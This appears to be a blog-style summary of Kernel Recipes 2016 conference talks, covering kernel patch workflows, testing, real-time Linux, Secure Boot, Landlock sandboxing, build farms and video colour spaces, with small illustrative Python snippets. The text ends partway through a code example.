Github is really nice: free hosting, drive-by contributors, etc. It's great for small projects. The downside is that it doesn't scale for large projects. Greg gives kubernetes as an example: there are 4000+ issues, 500+ outstanding pull requests. Github is getting better at handling some issues, but still requires constant Internet access, while the kernel has contributors that don't have constant Internet access.

gerrit's advantage is that project managers love it, because it gives them a sense of understanding what's going on. Unfortunately, it makes patch submission hard, it's difficult to handle patch series, and it doesn't allow viewing a whole patch at once if it touches multiple files. It's slow to use, and it makes local testing hard, so people have to work around it with scripts. Finally, it's hard to maintain as a sysadmin.

email

Plain text email has been around since forever. It's what the kernel uses. Everybody has access to email. It works with many types of clients. It's the same tool you use for other types of work. A disadvantage is gmail, exchange, outlook: many clients suck. Gmail as a mail server is good.

Read Documentation/email_clients.txt in order to learn how to configure yours.

Another advantage of email, is that you don't need to impose any tool. Some kernel developers don't even use git ! Although git works really well with email: it understands patches in mailbox format (git am), and you can pipe emails to it.
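
To show why a patch email is so easy for tools to consume, here is a small sketch that splits one into the parts git am cares about: the subject without its [PATCH] prefix, the commit message, and everything after the "---" separator line (diffstat and diff). It is a simplified illustration using Python's standard email module, not a reimplementation of git's parser; the function name is hypothetical, and it only handles plain single-part messages.

```python
import email
import re


def split_patch_email(raw: str):
    """Return (subject, commit_message, patch) from a plain-text patch email."""
    msg = email.message_from_string(raw)
    # Drop a leading "[PATCH]" or "[PATCH 1/2]" style prefix from the subject.
    subject = re.sub(r"^\[PATCH[^\]]*\]\s*", "", msg["Subject"])
    body = msg.get_payload()
    # A line containing only "---" ends the commit message.
    message, _, patch = body.partition("\n---\n")
    return subject, message.strip(), patch
```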

Project managers don't like it though because they don't see the status.

But there's a simple solution: you can simply install Patchwork, which you plug into your mailing list, and it gives you a nice overview of the current status. There's even a command line client.

Why does it matter ? Greg says it's simple, has a wide audience, it's scalable, and grows the community by allowing everybody to read and understand how the development process works. And there are no project managers.

Kubernetes and docker (github-native projects) are realizing this.

Greg's conclusion is that email is currently the best (or least bad?) tool for the job.

Why you need a test strategy for your kernel development

by Laurent Pinchart; video

Laurent showed us an example of how a very small, seemingly inconsequential change might introduce quite a bug. There's a need to test everything before submitting.

The toolbox used when he started to test his v4l capture driver is quite simple and composed of a few tools run in the console, in two different telnet connections.

He quickly realized that running the commands every time wouldn't scale. After writing a script simplifying the commands, he realized running the script in each of the 5 different terminal connections wouldn't scale either.

After this, he automated even further by putting images to be compared in a directory and comparing them with the output. But the test set quickly grew to over a gigabyte of test files.

Instead of using static files, the strategy was then to generate the test files on the fly with an appropriate program.

He then ran into an issue where the hardware wasn't sending data according to the datasheet. While looking at the data, he discovered he had to reverse engineer how the hardware worked for a specific image conversion algorithm (RGB to HSV).
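
The idea of generating reference data on the fly instead of storing it can be sketched as follows. This is not taken from vsp-tests: the test pattern and function names are hypothetical, and the conversion is the textbook RGB to HSV formula from Python's colorsys module, which is precisely the kind of reference that real hardware may deviate from.

```python
import colorsys


def gradient_frame(width, height):
    """Deterministic RGB test pattern: red ramps along x, green along y."""
    return [
        [
            (x * 255 // max(width - 1, 1), y * 255 // max(height - 1, 1), 128)
            for x in range(width)
        ]
        for y in range(height)
    ]


def expected_hsv(frame):
    """Reference HSV output, computed instead of stored on disk."""
    return [
        [colorsys.rgb_to_hsv(r / 255, g / 255, b / 255) for (r, g, b) in row]
        for row in frame
    ]
```

Because both the input and the expected output are computed, the test suite stays small no matter how many resolutions are covered.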

The rule of thumb Laurent advises is to have one test per feature. And to add one test for each bug. Finally, to add a test for each non-feature. For example, when you pass two opposite flags, you should get an error.
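
A "non-feature" test can be as small as the following sketch. The `configure` function and its two opposite flags are entirely hypothetical stand-ins for a driver interface; the point is only that the rejected combination gets its own test next to the feature test.

```python
def configure(enable_flip=False, disable_flip=False):
    """Hypothetical setup call that takes two opposite flags."""
    if enable_flip and disable_flip:
        raise ValueError("enable_flip and disable_flip are mutually exclusive")
    return {"flip": enable_flip}


def test_feature():
    # One test per feature: flipping can be turned on.
    assert configure(enable_flip=True) == {"flip": True}


def test_non_feature():
    # One test per non-feature: opposite flags must be rejected.
    try:
        configure(enable_flip=True, disable_flip=True)
    except ValueError:
        return
    raise AssertionError("opposite flags were accepted")
```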

The test suite Laurent developed is called vsp-tests and is used to test the specific vsp driver he has been working on. There are many other kinds of tests in the kernel (selftests, virtual drivers...), or outside of it (intel-gpu-tools, v4l2-compliance, linaro lava tests...).

While there are many test suites in the kernel development, there's no central place to run all of these.

Regarding CI, the 0-Day project now monitors git trees and kernel mailing lists, performs kernel builds for many architectures, in a patch-by-patch way. On failure it sends you an email. It also runs coccinelle, providing you a patch to fix issues detected by coccinelle. Finally, it does all that in less than one hour.

kernelci.org is another tool doing CI for kernel developers. There will be a talk about it on the next day.

There's also Mark Brown's build bot and Olof Johansson's autobuilder/autobooter.

That's it for day one of Kernel Recipes 2016 !

Man-pages: discovery, feedback loops and the perfect kernel commit message

by Michael Kerrisk; video

Presentation slides

Michael has been contributing man pages since around 2000. There are around 1400 pages.

When providing an overview, there are a few challenges: providing a history of the API, the reason for the design, etc.

One of Michael's recent goals has been preventing the addition of new buggy Linux APIs. There are a few examples of this. One of the reasons is the lack of prerelease testing.

There are design inconsistencies, like the different clone() versions. Behavioral inconsistencies might also creep in, like the mlock() vs remap_file_pages() differences in handling page boundaries.

Many process-changing APIs have different combinations of rules for matching the credentials of the process that can do the changes.

Another issue is long-term maintainability: an API must be extensible, which means making sure the flags are properly handled and bad combinations are rejected.
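
The flag-handling point can be illustrated with a small sketch. The flag names and values are hypothetical; the pattern shown is the usual one of rejecting both unknown bits and contradictory combinations with EINVAL, so that unused bits remain available for future extensions.

```python
import errno

# Hypothetical flags for an imaginary API.
FLAG_NONBLOCK = 0x1
FLAG_SHARED = 0x2
FLAG_PRIVATE = 0x4
KNOWN_FLAGS = FLAG_NONBLOCK | FLAG_SHARED | FLAG_PRIVATE


def check_flags(flags: int) -> int:
    """Return 0 if `flags` is acceptable, or a negative errno value."""
    # Reject unknown bits: otherwise callers may start passing garbage,
    # and those bits can never be given a meaning later.
    if flags & ~KNOWN_FLAGS:
        return -errno.EINVAL
    # Reject contradictory combinations explicitly.
    if (flags & FLAG_SHARED) and (flags & FLAG_PRIVATE):
        return -errno.EINVAL
    return 0
```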

We don't do proper API design in Michael's opinion. And when it fails, userspace can't be changed, and the kernel has to live with the problems forever.

Mitigations

In order to fix this, unit tests are a good first step. The goal is to prevent regressions. But where should they be put ? One of the historical homes of testing was the Linux Test Project. But those tests are out of tree, with only partial coverage.

In 2014, the kselftest project was created; it lives in-tree, and is still maintained.

A test needs a specification. It turns out specifications help tell the difference between the implementation and the intent of the programmer. It's recommended to put the specification at the minimum in the commit message, and at best to send a man-page patch.

Another great mitigation is to write a real application. inotify is a good example of that: it took Michael 1500 lines of code to fully understand the limitations and tricks of inotify. For example, you can't know which user/program made a given file modification. The non-recursive monitoring nature of inotify also turned out to be quite expensive for a large directory. A few other limitations were found while writing an example program.

The main point is that you need to write a real-world application if you're writing any non-trivial API in order to find its issues.

Last but not least, writing good documentation is a great idea: it widens the audience, allows easier understanding, etc.

Issues

A problem though is discoverability of new APIs. A good idea is to Cc the linux-api mailing list. Michael runs a script to watch for changes for example. It's an issue, because sometimes ABI changes might happen involuntarily, while they are a complete no-no in kernel development.

Sometimes, we get silent API changes. One example was an adjustment of the posix mq implementation that was discovered years after. By then it was too late to reverse. Of course, this API had no unit tests.

The goal to fix this is to get as much feedback as possible before the API is released to the public. You should shorten the feedback loop.

Examples

The example of a recent cgroup change was given, where improvements to the commit message over successive versions gave people a better understanding of the problem that was corrected. It makes life easier for the reviewer, for userspace developers, etc.

The advice to the developer for a commit message is to assume as little knowledge as possible on the part of the audience. This needs to be done at the beginning of the patch series so many people can give feedback.

The last example is Jeff Layton's OFD locks work: he made a near perfect API change proposal, with a good explanation, example programs, publicity, a man-page patch, a glibc patch, and even a proposed POSIX standard change.

In response to a question in the audience about the state of process to introduce Linux kernel changes, Michael went as far as to propose that there be a full-time Linux Userspace API maintainer, considering the huge amount of work that needs to be done.

Real Time Linux: who needs it ? (Not you!)

by Steven Rostedt; video

What is Real Time ?

It's not about being fast. It's about determinism. It gives us repeatability, reliability, a known worst-case scenario and a known reaction time.

Hard Real Time is mathematically provable, and has bounded latency. The more code you have, the harder it is to prove.

With soft Real Time you can deal with outliers, but have unbounded latency.

Examples of hard real time include airplane engine controls, nuclear power plants, etc. Examples of soft real time include video systems, video games, and some communication systems. Linux is today a Soft Real Time system.

PREEMPT_RT in Linux

It's not a Soft Real Time system because it doesn't allow for outliers or unbounded latency. But it's not Hard Real Time either because it can't be mathematically proven. Steven says it's Hard Real Time "Designed".

If it had no bugs, Linux would be a Hard Real Time system. It's used by financial industries, audio recordings (jack), navigational systems.

Lots of features from PREEMPT_RT have been integrated in the kernel. Examples include highres timers, deadline scheduler, lockdep, ftrace, mostly tickless kernel etc. It allowed people to test SMP-related bugs with only one CPU, since it changed the way spinlocks worked, giving Linux a head start of several years in SMP performance.

But every year PREEMPT_RT also keeps evolving and getting bigger. Features still only in PREEMPT_RT and missing from mainline include the conversion of spin locks to sleeping mutexes.

Latency always happens. When you have an interrupt, it might run and steal processor time from a high-priority thread. But with threaded interrupts, you can make sure the "top half" runs for as little time as possible, just to wake up the appropriate thread that will handle the interrupt.
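
The split between a short "top half" and a handler thread can be modelled in userspace. The sketch below is only an analogy written with Python threads, with hypothetical class and method names; it shows the shape of the pattern (queue the event, return immediately, let a thread do the work), not the kernel's implementation.

```python
import queue
import threading


class ThreadedIrq:
    """Toy model of a threaded interrupt handler."""

    def __init__(self, handler):
        self._pending = queue.Queue()
        self._handler = handler
        self._thread = threading.Thread(target=self._run, daemon=True)
        self._thread.start()

    def top_half(self, event):
        # Do the bare minimum: hand the event over and return at once.
        self._pending.put(event)

    def _run(self):
        # The handler thread does the real work. In the kernel it is a
        # schedulable thread, so it can be given its own priority.
        while True:
            event = self._pending.get()
            if event is None:
                break
            self._handler(event)

    def stop(self):
        # A None sentinel asks the handler thread to exit.
        self._pending.put(None)
        self._thread.join()
```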

Hardware matters

The hardware needs to be realtime (cache/TLB misses, etc.) as well, but this is the topic of Steven's next talk. Come back tomorrow !

kernelci.org : 2 million kernel boots and counting

by Kevin Hilman; video

Kevin showed his growing collection of boards sitting in his home office, that is in fact part of kernelci.org.

Over the last years, the number of different boards supported by device trees has exploded, while board files have been slowly removed. The initial goal was therefore to test as many boards as possible, while trying to keep up with the growing number of new machines.

It started with automation of a small board farm, and then grew into kernelci.org, that builds, boots and reports on the status through web, mail or RSS.

Many trees are being tested, with many maintainers requesting that their tree be part of the project.

The goal of kernelci.org is to boot those kernels. Building is just a required step. There are currently 31 unique SoCs, across four different architectures, with 200+ unique boards.

A goal is to quickly find regressions on a wide range of hardware. Another goal is to be distributed. Anyone having a board farm can contribute. There are currently labs at Collabora, Pengutronix, BayLibre, etc. And all of this is done in the open, by a small team, none of whose members work full-time on it.

Once booted, a few test suites are run, but no reporting or regression testing is done, and this is only done on a small subset of platforms. The project is currently looking for help in visualization and regression detection, since the logs of these tests aren't automatically analyzed. They also would like to have more hardware dedicated to long-running tests.

They have a lot of ideas for new features that might be needed, like comparing size of kernel images, boot times, etc.

The project is also currently working on energy regressions. The project uses the ARM energy probe and BayLibre's ACME to measure power during boot, tests, etc. The goal is to detect major changes, but this is still under development. Data is being logged, but not reported or analyzed either.

How to help ? A good way to start might be to just try it, and watch the platforms/boards you care about. The project is looking for contributors in tools, but also for people to automate their lab and submit the results. For the lazy, Kevin says you can just send him the hardware, as long as it's not noisy.

Kevin finally showed his schematics to plug in many boards, using an ATX power supply, with USB-controlled relays and huge USB hubs. The USB port usage explodes since in the ARM space, many boards need a USB power supply, and then another USB port for the serial converter.

Debian's support for Secure Boot in x86 and arm

by Ben Hutchings; LWN article

Secure Boot is an optional feature in UEFI that protects against persistent malware if implemented correctly. The only common trusted certificates on PCs are for Microsoft signing keys. They will sign bootloaders on PCs for a small fee, but on Windows ARM the systems are completely locked down.

For GNU/Linux, the first stage needs an MS signature. Most distributions ship "shim" as a first stage bootloader that won't need updating often.

For the kernel, you can use Matthew Garrett's patchset to add a 'securelevel' feature, activated when booted with Secure Boot, that makes module signatures mandatory, and disables kexec, hibernation and other peek/poke kernel APIs. Unfortunately this patch is not upstream.

The issue with signatures is that you don't want to expose signing keys to build daemons. You need to have reproducible builds that can't depend on anything secret, therefore you can't auto-build the signed binary in a single step. Debian's solution is to have an extra source package. The first one from which you build the unsigned binary, and a second one in which you put signatures you generated offline.

This new package is called linux-signed. It contains detached signatures for a given version, and a script to update them for a new kernel version. This is currently done on Ben's machine, and the keys aren't trusted by grub or shim.

Signing was added to the Debian archive software dak. This allows converting unsigned binaries to signed ones.

While this was already done in Ubuntu, the process is different for Debian (doesn't use Launchpad). Debian signs kernel modules, has detached signatures (as opposed to Ubuntu's signed binaries), and supports more architectures than amd64. Finally, the kernel packages from Ubuntu and Debian are very different.

Julien Cristau then came on stage to explain his work on signing with a PKCS#11 hardware security module (Yubikey for now). Signing with an HSM is slow though, so this is only done for the kernel image, not modules.

You can find more information on the current status of Secure Boot on the Debian wiki. The goal is to have all of this ready for the stretch release, which freezes in January 2017.

The current state of kernel documentation

by Jonathan Corbet; video

Documentation is unsearchable, and not really organized. There is no global vision, and everything is a silo.

Formatted documentation (in source-code) is interesting because it's next to the code. It's generated with "make htmldocs", and is a complex multi-step system developed by kernel developers. It parses the source files numerous times for various purposes, and is really slow. The output is ugly, and doesn't integrate with the rest of the Documentation/ directory.

How to improve this ? Jon says it needs to be cleaned up, while preserving text access.

Recently, asciidoc support was added in kernel comments. It has some advantages but adds a dependency on yet-another tool.

Jon suggests that it would have been better to get rid of DocBook entirely, and rework the whole documentation build toolchain instead of adding new tools on top.

To do this, Jon had a look at Sphinx, a documentation system in Python using reStructuredText. It is designed for documenting code and generating large documents, and is widely supported.

After posting a proof of concept, Jani Nikula took responsibility and pushed it into a working system. It now supports all the old comments, but also supports RST formatting. To include kerneldoc comments, Jani Nikula wrote an extension module to Sphinx.

All this work has been merged for 4.8, and there are now Sphinx documents for the kernel doc HOWTO, GPU and media subsystems.

Developers seem to be happy for now, and a new manual is coming in 4.9: Documentation/driver-api is a conversion of the device drivers book. Of course, this is just the beginning, as there are lots of files to convert to the new format, and Jon estimates this might take years until it's done.

For 4.10, a goal would be to consolidate the development process docs (HOWTO, SubmittingPatches, etc.) into a single document. The issue here is that some of these files are really well-known, and often pointed-to, and this would break a lot of "links" in a way.

Landlock LSM: Unprivileged sandboxing

by Mickaël Salaün; video, LWN article

The goal of landlock is to restrict processes without needing root privileges.

The use case is to be used by sandboxing managers (flatpak for example).

Landlock rules are attached to the current process via seccomp(). They can also be attached to a cgroup via bpf().

Mickaël then showed a demo of the sandboxing with a simple tool limiting the directories a given process can access.

The approach is similar to Seatbelt or OpenBSD Pledge. It's here to minimize the risk of sandbox escape and prevent privilege escalation.

Why do existing features not fit with this model ? The four other LSMs didn't fit the needs because they are designed to be controlled by the root/admin user, while Landlock is accessible to regular users.

seccomp-BPF can't be used because it can't filter arguments that are pointers, because you can't dereference userland memory to have deep filtering of syscalls.

The goal of Landlock is to have a flexible and dynamic rule system. It of course has hard security constraints: it aims to minimize the attack surface, prevent DoS, and be able to work for multiple users by supporting independent and stackable rules.

The initial thought was to extend the seccomp() syscall, but then it was switched to eBPF. The access rules are therefore sent to the kernel with bpf().

Landlock uses LSM hooks for atomic security checks. Each rule is tied to one LSM hook. It uses a map of handles, a native eBPF structure, to give rules access to kernel objects. It also exposes to eBPF rules filesystem helpers that are used to handle tree access, or fs properties (mount point, inode, etc.).

Finally, bpf rules can be attached to a cgroup thanks to a patch by Daniel Mack, and Landlock uses this feature.

Rules are either enforced with the process hierarchy, with the seccomp() interface to which Landlock adds a new command; or via cgroups for container sandboxing.

The third RFC patch series for Landlock is available here.

Lightning talks

the Free Software Bastard Guide

by Clement Oudot; video

This is a nice compilation of things not to do as a user, developer or enterprise. While the talk was very funny, I won't do you the offense of making a summary since I'm sure all my readers are very disciplined open source contributors.

(slides)

Mini smart router

by Willy Tarreau; video

This is about a small device made by Gl-inet. It has an Atheros SoC (AR9331) with a MIPS processor, 2 ethernet ports, wireless, 64MB of RAM and 16MB of flash.

The documentation and sources are available for the Aloha Pocket, a small distro running on the hardware.

Corefreq

by Cyril

Corefreq measures Intel CPU frequencies and states. It gives you a few hardware metrics. You can learn more on the Corefreq GitHub page.

That's it for day two of Kernel Recipes 2016 !

Speeding up development by setting up a kernel build farm

by Willy Tarreau; video, LWN article

Some people might spend a lot of time building the Linux kernel, and this hurts the development cycle/feedback loop. Willy says during backporting sessions, the build time might dominate the development time. The goal here is to reduce the wait time.

In addition, build times are often impossible to predict when you might have an error in the middle breaking the build.

Potential solutions include buying a bigger machine or using a compiler cache, but this does not fit Willy's use case.

Distributed building is the solution chosen here. But as a first step, this requires a workload that can be distributed, which isn't trivial at all for most projects. Fortunately, the Linux kernel fits this model.

You need to have multiple machines, with the exact same compiler everywhere. Willy's proposed solution is to build the toolchain yourself, with crosstool-ng. You then combine this with distcc, which is a distributed build controller, with low overhead.

Distcc still does the preprocessing and linking steps locally, which will consume approx 20% to 30% of the build time. And you need to disable gcov profiling.
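To get a feel for what those local steps cost, here is a back-of-the-envelope sketch using Amdahl's law. It is not from the talk: it assumes the 20% to 30% figure is the share of a single-machine build that stays on the controller, and the function name is made up for the example.

```python
def max_speedup(local_fraction, nodes):
    """Amdahl's law: speedup when only the non-local part is spread over `nodes`."""
    if not 0.0 <= local_fraction <= 1.0:
        raise ValueError("local_fraction must be between 0 and 1")
    if nodes < 1:
        raise ValueError("nodes must be at least 1")
    distributed = 1.0 - local_fraction
    return 1.0 / (local_fraction + distributed / nodes)


# Assumed local shares (preprocessing + linking), taken from the 20%-30% range.
for fraction in (0.2, 0.3):
    for nodes in (4, 16, 64):
        print(f"local={fraction:.0%} nodes={nodes:3d} "
              f"speedup={max_speedup(fraction, nodes):.2f}x")
```

Under that assumption, adding nodes can never bring more than a 1/0.2 = 5x (or 1/0.3, about 3.3x) speedup, which is one way to see why the controller matters so much.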

In order to measure efficiency of a build farm, you need to compare performance. This requires a few steps to make sure the metric is consistent, as it might depend on number of files, CPU count, etc. Counting lines of code after preprocessing might be a good idea to have a per-line metric.
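A per-line metric like this could be computed roughly as follows. This is only a sketch of the idea, not Willy's actual tooling: the function names are hypothetical, and it assumes you already have the preprocessor output as text and a measured build time.

```python
def count_preprocessed_lines(text):
    """Count non-blank lines, skipping lines starting with '#'
    (the preprocessor emits line markers such as '# 1 "file.c"')."""
    return sum(1 for line in text.splitlines()
               if line.strip() and not line.startswith("#"))


def lines_per_second(total_lines, build_seconds):
    """Normalize a build time into a per-line throughput figure."""
    if build_seconds <= 0:
        raise ValueError("build_seconds must be positive")
    return total_lines / build_seconds


sample = '# 1 "a.c"\nint x;\n\nint y;\n'
print(count_preprocessed_lines(sample), "lines")
print(lines_per_second(1000, 4), "lines/s")
```

Comparing lines per second instead of raw build times makes two runs comparable even if they didn't build the same set of files.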

Hardware

In order to select suitable machines, you first need to consider what you want to optimize for. Is it build performance at given budget, number of nodes, or power consumption ?

Then, you need to wonder what impacts performance. CPU architecture, DRAM latency, cache sizes and storage access time are all important to consider.

For the purpose of measuring performance, Willy invented a metric he calls "BogoLocs". He found that dram latency and L3 cache are more important for performance than CPU frequency.

To optimize for performance, you must make sure your controller isn't the bottleneck: its CPU or network access shouldn't be saturated for instance.

PC-type machines are by far the fastest, with their huge cache and multiple memory channels. However, they can be expensive. A good idea might be to look at gamer-designed hardware, that provides the best cost-to-performance ratio.

If you're optimizing for a low number of nodes, buy a single dual-socket high-frequency, x86 machine with all RAM slots populated.

If you're optimizing for hardware costs, a single 4-core computer can cost $8 (NanoPi). But there are a few issues: there are hidden costs (accessories, network, etc.), it might be throttled when heating, and some machines are unstable because of overclocking, while only achieving up to 1/16th of the performance of a $800 PC.

You can also look at mid-range hardware (NanoPI-M3, Odroid C2), up to quad-core Cortex A9 at 2GHz. But then they run their own kernel. "High-range" low cost hardware are often sold as "set-top-boxes" (MiQi, RKM-v5, etc.) Some of these can even achieve 1/4th performance of a $800 PC. But there are gotchas as well, with varying build quality, high power draw, thermal throttling.

The MiQi board at $35 is Willy's main choice according to his performance measurements (or its CS-008 clone). It's an HDMI dongle that can be opened and used barebones. You don't need to use a big linux distribution, a simple chroot is enough for gcc and distcc.
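To compare these options, one can compute performance per dollar from the figures quoted above. This is my own arithmetic, not a slide from the talk: it ignores the hidden costs, and it assumes the MiQi reaches the 1/4th figure quoted for "high-range" boards, which the notes above don't state explicitly.

```python
def perf_per_dollar(relative_perf, price):
    """Performance relative to the $800 PC, divided by the purchase price."""
    if price <= 0:
        raise ValueError("price must be positive")
    return relative_perf / price


# (relative performance, price in dollars); the MiQi entry is an assumption.
boards = {
    "PC ($800)": (1.0, 800.0),
    "NanoPi ($8, up to 1/16th)": (1 / 16, 8.0),
    "MiQi ($35, assumed 1/4th)": (1 / 4, 35.0),
}

baseline = perf_per_dollar(*boards["PC ($800)"])
for name, (perf, price) in boards.items():
    ratio = perf_per_dollar(perf, price) / baseline
    print(f"{name}: {ratio:.2f}x the PC's performance per dollar")
```

On paper the cheapest board wins, but you need sixteen of them (plus accessories and network ports) to match one PC, which is where the hidden costs come in.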

All the data from this presentation is on a wiki.

Understanding a real-time system: more than just a kernel

by Steven Rostedt; video

Real-time is hard. Having a preempt-rt patched kernel is far from enough. You need to look at the hardware underneath, and the software on top of it, and in general have a holistic view of your system.

A balance between a Real-Time system versus a "Real-Fast" system needs to be found.

You have to go with a Real-Time hardware if you want a real-time system. It's the foundation, and if you don't have it, you can forget about your goal.

Non-real-time hardware features

Memory cache impacts determinism. One should find the worst-case scenario, by trying to run without the cache.

Branch prediction misses can severely impact determinism as well.

NUMA, used on multi-CPUs hardware, can cause issues whenever a task tries to access memory from a remote node. So the goal is to make sure a real-time task always uses local memory.

Hyper-Threading on Intel processors (or AMD's similar tech) is recommended to be disabled for Real-Time.

Translation Lookaside Buffer is a cache for page tables. But this means that any miss would kill determinism. Looking for the worst-case scenario during testing by constantly flushing the TLB is needed for a real-time system.

Transactional Memory allows for parallel action in the same critical section, so it makes things pretty fast, but makes the worst case scenario hard to find when a transaction fails.

System Management Interrupt (SMI) puts the processor in System Management Mode. On a customer box, Steven was able to find that every 14 minutes, an interrupt was eating CPU time, which was in fact an SMI for ECC memory.

CPU Frequency scaling needs to be disabled (idle polling). While not environmentally friendly, it's a necessity for determinism.

Non-real-time software features

When you're using threaded interrupts, you need to be careful about priority, especially if you're waiting for important interrupts, like network if you're waiting for data.

Softirqs need to be looked at carefully. They are treated differently in PREEMPT_RT kernels, since they are run in the context of who raises them. Except when they are raised by real Hard interrupts like RCU or timers.

System Management Threads like RCU, watchdog or kworker also need to be taken into account, since they might be called as side-effect of a syscall required by the real-time application.

Timers are non-evident as well and might be triggered with signals, that have weird posix requirements, making the system complex, also impacting determinism.

CPU Isolation, whether used with the isolcpus kernel command line parameter, or with cgroup cpusets can help determinism if configured properly.
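The userspace side of this is placing the real-time task on the reserved CPU. Here is a minimal sketch of that step only, using Python's os.sched_setaffinity (Linux-only). The helper name is mine, and affinity alone does not isolate anything: keeping other tasks off that CPU is what isolcpus or cpusets are for.

```python
import os


def pin_to_cpus(cpus, pid=0):
    """Restrict `pid` (0 means the calling process) to the given CPU numbers
    and return the resulting affinity set."""
    os.sched_setaffinity(pid, set(cpus))
    return os.sched_getaffinity(pid)


# Example (commented out so that importing this file changes nothing):
# pin_to_cpus([3])   # assumes CPU 3 was isolated, e.g. with isolcpus=3
```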

NO_HZ is good for power management thanks to longer sleeps, but might kill latency since coming out of sleep can take a long time, leading to missed deadlines.

NO_HZ_FULL might be able to help with real-time once ready, since it can keep the kernel from bothering real-time tasks by removing the last 1-second tick.

When writing an RT Task, memory locking with mlockall() is necessary to prevent page faults from interrupting your threads. Enabling priority inheritance is a good idea to prevent some types of locking situations leading to unbounded latency.

Linux Driver Model

by Greg Kroah-Hartman; video

Presentation files

Greg says nobody needs to know about the driver model.

If you're doing reference counting, use struct kref, it handles lots of really tricky edge cases. You need to use your own locking though.

The base object type is struct kobject, it handles the sysfs representation. You should probably never use it, it's not meant for drivers.

On top of that struct attribute provides sysfs files for kobjects, also to never be managed individually. The goal here is to have only one text or binary value per file. It prevents a problem seen in /proc where multiple values per file broke lots of applications when values were added, or unavailable.

kobj_type handles sysfs functions, namespaces, and release().

struct device is the universal structure, that everyone sees. It either belongs to a bus or a "class".

struct device_driver handles a driver that controls a device. It does the usual probe/remove, etc.

struct bus_type binds devices and drivers, matching, handles uevents and shutdown. Writing a bus is a complex task, it requires at least 300 lines of code, and has lots of responsibilities, with little helper functions.

Creating a device is not easy either, as you should set its position in the hierarchy (bus type, parent) and its attributes, and initialize it in a two-step way to prevent race conditions.

Registering a driver is a bit simpler (probe/release, ownership), but still complex. struct class are userspace-visible devices, very simple to create (30-40 lines of code). A class has a lot of responsibilities, but most of those are handled by default, so not every driver has to implement them.

Greg says usb is not a good example to understand the driver model, since it's complex and stretches it to its limits. The usb2serial bus is a good example.

The implementation relies on multiple levels of hierarchy, and has lots of pointer indirections throughout the tree in order to find the appropriate function for an operation (like shutdown()).

Driver writers should only use attribute groups, and (almost) never call sysfs_*() functions. Greg says you should never use platform_device. This interface is abused instead of using a real bus, or the virtual bus.

Greg repeated that raw sysfs/kobjects should never be used.

Analyzing Linux Kernel interface changes by looking at binaries

by Dodji Seketeli; LWN article

What if we could see changes in interfaces between the kernel and its modules just by looking at the ELF binaries ? It would be a kind of diff for binaries, and show changes in a meaningful way.

abidiff already does almost all of this for userspace binaries. It builds an internal representation of an API corpus, and can compute differences. Dodji showed us how abidiff works.

Unfortunately, there's nothing yet for the Linux Kernel. Dodji entertains the idea of a "kabidiff" tool that would work like abidiff, but for the Linux kernel.

For this to work, it would need to handle special Linux ELF symbol sections. For instance, it would restrain itself to "__export_symbol" and "__export_symbol_gpl" sections. It would also need to support augmenting an ABI corpus with artifacts from modules.

In fact, work on this has just started in the dodji/kabidiff branch of libabigail.git.

Video color spaces

by Hans Verkuil; LWN article

struct v4l2_pix_format introduced in kernel 3.18 is the subject of the talk.

Hans started by saying that Color is an illusion, interpreted by the brain.

A colorspace is actually the definition of the type of light source, where the white point is, and how to reproduce it.

Colorspaces might be linear, but neither human vision nor early CRTs were. So to convert from a linear to a non-linear colorspace, you define a transfer function.
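As an illustration of what a transfer function looks like, here is the sRGB one in a few lines of Python. This is not from Hans' slides; I'm using the constants from the sRGB definition, and the function names are mine.

```python
def srgb_encode(linear):
    """Linear light (0..1) to non-linear sRGB: a short linear segment near
    black, then a power curve."""
    if linear <= 0.0031308:
        return 12.92 * linear
    return 1.055 * linear ** (1 / 2.4) - 0.055


def srgb_decode(encoded):
    """Inverse of srgb_encode: non-linear sRGB back to linear light."""
    if encoded <= 0.04045:
        return encoded / 12.92
    return ((encoded + 0.055) / 1.055) ** 2.4


for value in (0.0, 0.01, 0.18, 0.5, 1.0):
    print(f"linear {value:.2f} -> encoded {srgb_encode(value):.4f}")
```

Mid-range linear values end up well above their linear position once encoded, which is the whole point: more code values are spent on the darker tones where the eye is more sensitive.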

In video, we often use the Y'CbCr (YUV) colorspace. Converting to and from RGB is possible. You can represent all colors in all colorspaces, as long as you don't do quantization (cutting off values <0 and >1), which is why you should always do it last.
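The "do it last" advice can be shown with a small sketch. It uses the Rec. 709 luma coefficients for the conversion; the sample value and helper names are mine, not from the talk.

```python
KR, KB = 0.2126, 0.0722          # Rec. 709 luma coefficients
KG = 1.0 - KR - KB


def rgb_to_ycbcr(r, g, b):
    """R'G'B' to Y' and Cb, Cr (nominally 0..1 and -0.5..0.5)."""
    y = KR * r + KG * g + KB * b
    cb = (b - y) / (2.0 * (1.0 - KB))
    cr = (r - y) / (2.0 * (1.0 - KR))
    return y, cb, cr


def ycbcr_to_rgb(y, cb, cr):
    """Exact inverse of rgb_to_ycbcr, with no clipping."""
    r = y + 2.0 * (1.0 - KR) * cr
    b = y + 2.0 * (1.0 - KB) * cb
    g = (y - KR * r - KB * b) / KG
    return r, g, b


def clip(values, low=0.0, high=1.0):
    """Cut off everything below 0 and above 1."""
    return tuple(min(high, max(low, v)) for v in values)


original = (0.9, 0.0, 0.3)             # a Y'CbCr value outside the R'G'B' cube
unclipped = ycbcr_to_rgb(*original)    # the red component ends up above 1.0
print("kept   :", rgb_to_ycbcr(*unclipped))
print("clipped:", rgb_to_ycbcr(*clip(unclipped)))
```

As long as the out-of-range red value is carried along, the round trip gives back the original triple. Clip in the middle and the luma changes for good.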

There are a few standards to describe colorspaces: Rec 709, sRGB, SMPTE 170M, and lately BT 2020 used for HDTVs.

Typically, colorspace names might be confusing, the conversion matrices might be buggy, and applications would just ignore colorspace information. Sometimes, hardware uses a bad transfer function.

In the end Hans found that only half of the v4l2_pix_format structure fields were useful.

Hans showed examples of the difference of transfer functions between SMPTE 170M and Rec. 709. The difference between Rec. 709 and sRGB, or between Rec. 709 and BT.601 Y'CbCr is more visible. Those examples would be impossible to see on a projector, but luckily the room at Mozilla's has huge LCD screens. But even there, it's not enough, since with Full/Limited Range Quantization, a light grey color visible on Hans' screen was simply white when displayed on the big screen and in the recording stream. Some piece of the video chain was just doing quantization "bad".
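I don't know which piece of the chain was at fault that day, but here is one way a light grey can turn white: a full-range 8-bit value being decoded as if it were limited range (16 to 235 for luma). The sketch below is my own illustration with made-up function names.

```python
def encode_full(level):
    """0..1 to an 8-bit full-range code (0..255)."""
    return round(255 * level)


def decode_full(code):
    return code / 255


def encode_limited(level):
    """0..1 to an 8-bit limited-range luma code (16..235)."""
    return round(16 + 219 * level)


def decode_limited(code):
    """Limited-range code back to 0..1, clipping whatever falls outside."""
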